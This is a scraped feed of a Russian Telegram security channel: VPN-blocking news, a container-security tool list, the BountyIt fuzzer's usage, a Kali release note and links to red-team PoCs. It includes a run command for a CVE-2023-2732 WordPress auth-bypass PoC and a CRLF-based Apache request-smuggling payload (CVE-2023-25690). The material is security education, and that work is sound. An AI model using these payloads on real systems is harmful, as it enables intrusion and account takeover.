Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Hacker News
Российские провайдеры начали блокировать подключения OpenVPN https://xakep.ru/2023/05/31/openvpn-block/
Wireguard пока работает стабильно. Но возможно он на очереди на расстрел 🔫
Please open Telegram to view this post
VIEW IN TELEGRAM
Предлагайте свои идеи/технологии на замену заблокированных. Если соберём список, то сделаю ресерч на что и как лучше переходить.
🤣71
Forwarded from Just Security
Туллинг для специалистов по безопасности контейнеров

В современной разработке контейнеризация радикально изменила способ, которым мы создаем, развертываем и управляем приложениями. Но с этой новой парадигмой приходит и критическая необходимость в безопасности контейнеров.

Вашему вниманию предлагается несколько категорий и инструментов, которые помогут поддержать уровень защищенности на приемлемом уровне (только free / opensource):

Container image scanning:

- Clair
- Trivy
- Anchore Engine
- Grype

Container orchestration:

- Kubernetes
- Apache Mesos
- Nomad

Runtime protection:

- Tracee
- Sysdig
- Falco
- KuberArmor

Configuration management:

- Ansible
- Chef
- Puppet

Vulnerability management:

- Greenbone
- DefectDojo

Container firewall:

- Calico
- Cilium
- Weave Net

Security information and event management (SIEM):

- ELK
- Wazuh

Identity and access management (IAM):

- Keycloak
- OpenIAM

Continuous integration and deployment (CI/CD):

- Jenkins
- GitLab CI/CD
- Travis CI
- GitHub Actions
- Bamboo

Incident response:

- TheHive

Kubernetes Security:

- Aqua Security
- Sysdig Secure
- Twistlock
🔴BountyIt

Fuzzer на golang для поиска уязвимостей типа xss, lfi, rce, ssti и т.д., который обнаруживает уязвимость по изменению длины содержимого и проверяет ее с помощью сигнатур.

Установка:
go install github.com/shivangx01b/BountyIt@latest

Синтаксис фаззинга:
https://example.com/FUZZ

https://example.com/?query=FUZZ

Использование:
echo "https://example.com/FUZZ" | BountyIt

cat http_https.txt | BountyIt -t 70 -p payloads.txt -verify

cat http_https.txt | BountyIt -t 70 -header "Cookie: session=311x1211sx4..." -p payloads.txt -grep signatures.txt


#tools #bugbounty
4❤‍🔥2🆒1
Вышла Kali Linux 2023.2 с 13 новыми инструментами и образом HyperV

Компания Offensive Security представила Kali Linux 2023.2, вторую версию дистрибутива в 2023 году. Теперь Kali содержит готовый образ Hyper-V и тринадцать новых инструментов, включая фреймворк Evilginx для кражи учетных данных и cookie сеансов.
Одним из наиболее заметных обновлений в этом выпуске стал pre-built образ Hyper-V, настроенный для Enhanced Session Mode, что позволяет подключаться к виртуальной машине с помощью RDP. Новый образ Hyper-V уже можно загрузить с kali.org, после чего останется распаковать и запустить извлеченный скрипт install-vm.bat.

#kali_update
👍1
Похек
KotlinNotesForProfessionals.pdf
Судя по репостам контент понравился)
2
This media is not supported in your browser
VIEW IN TELEGRAM
7🔥7🎉2
Red Team Research

Коллекция PoC и наступательных техник, используемых BlackArrow Red Team

#collection
👏3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Что тут у нас? Ой, очередное LPE😁

https://github.com/Dec0ne/DavRelayUp


DavRelayUp - a universal no-fix LPE in domain-joined windows workstations where LDAP signing is not enforced (the default settings).


#ad #redteam #pentest #lpe
Объявляю неделю мемов про Apple Vision Pro открытой 😁
❤‍🔥12🌚2
MStore API <= 3.9.2 - Authentication Bypass
CVE-2023-2732

Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.

PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u http://TARGET


#CVE #POC
🆒3
Forwarded from Private Shizo
🔥CVE-2023-3079(bug id: 1450481) - Type Confusion in V8
( 0-day, may have been actively exploited/ITW )
Reviewed here:
4584248 "[ic] Fix store handler selection for arguments objects"
Forwarded from Monkey Hacker
Apache HTTP-Request-Smuggling (CVE-2023-25690)

Где-то в апреле была шумиха с новой вулной в Apache, когда mod_proxy вместе с правилами RewriteRule и ProxyPassMatch, приводил к HTTP-Request-Smuggling

В первом случае был следующий прикол

Пользователь запрашивает URL https://testik.com/categories/1, а RewriteRule сопоставляет URL и захватывает значение 1 с помощью регулярного выражения ^/categories/(.*). Затем правило переписывает URL на http://testik.com:8080/categories?id=1, добавляя перехваченное значение к переписанному URL в качестве id параметра запроса.

ProxyPassReverse, уже просто заменяет домен и адрес внутреннего сервера на домен и адрес прокси-сервера, чтобы клиент мог правильно переходить по ссылкам и получать доступ к контенту с проксированного внутреннего сервера /categories/ http://example-shop.com:8080/. Весело, да?


Плюс, замечу, что Apache был уязвим еще к CRLF-injection, который нам будет нужен в дальнейшем

Для его эксплуатации мы уже имеем следующиим запрос

GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host: localhost


И теперь делаем смагглинг запрос

GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: localhost


И ответ будет следующий

GET /categories.php?id=1 HTTP/1.1
Host: localhost

GET /SMUGGLED HTTP/1.1
Host: backend
PortSwigger Labs ERR_TIMED_OUT in Burp Suite browser

Если вы сталкивались с проблемой, когда лабы с PortSwigger не открываются в браузере BurpSuite. То вот решение:
1. Открываем браузер и переходим на chrome://flags
2. Далее в поиске пишем Encrypted ClientHello и ставим значение Disabled
3. Нажимаем Relaunch
4. Готово! Продуктивного похека 😎
5. Делимся этой шпорой

#полезное
5